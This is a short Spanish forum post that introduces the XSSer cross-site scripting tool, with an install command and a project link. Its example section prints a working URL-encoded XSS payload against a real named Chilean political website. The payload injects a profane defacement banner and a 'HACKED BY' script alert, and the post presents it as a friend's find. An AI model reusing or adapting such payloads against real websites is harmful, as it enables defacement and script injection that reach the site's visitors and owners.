XSSer es una herramienta de prueba que automatiza el proceso de detección y explotación de inyecciones XSS contra diferentes aplicaciones.
XSS Es un tipo de inseguridad informática típico de las aplicaciones Web,
que permite a una tercera parte inyectar código JavaScript en páginas web vistas por el usuario.
Instalacion
apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip en bt ya esta instalada
EJEMPLO
xss descubierto por mi amigo Crackx
http://www.senadorvirtual.cl/dgeneral.php?ideleg&idusuario=%22%3E%3Ch1%3EFUCK+POLITICOS+KULIAOS+0wn3d+Team%3C%2Fh1%3E%3Cscript%3Ealert%28%22HACKED+BY+Crackx+FUCK+POLITICOS%22%29%3C%2Fscript%3E
mas Info ->http://xsser.sourceforge.net/
Gracias por tu aporte.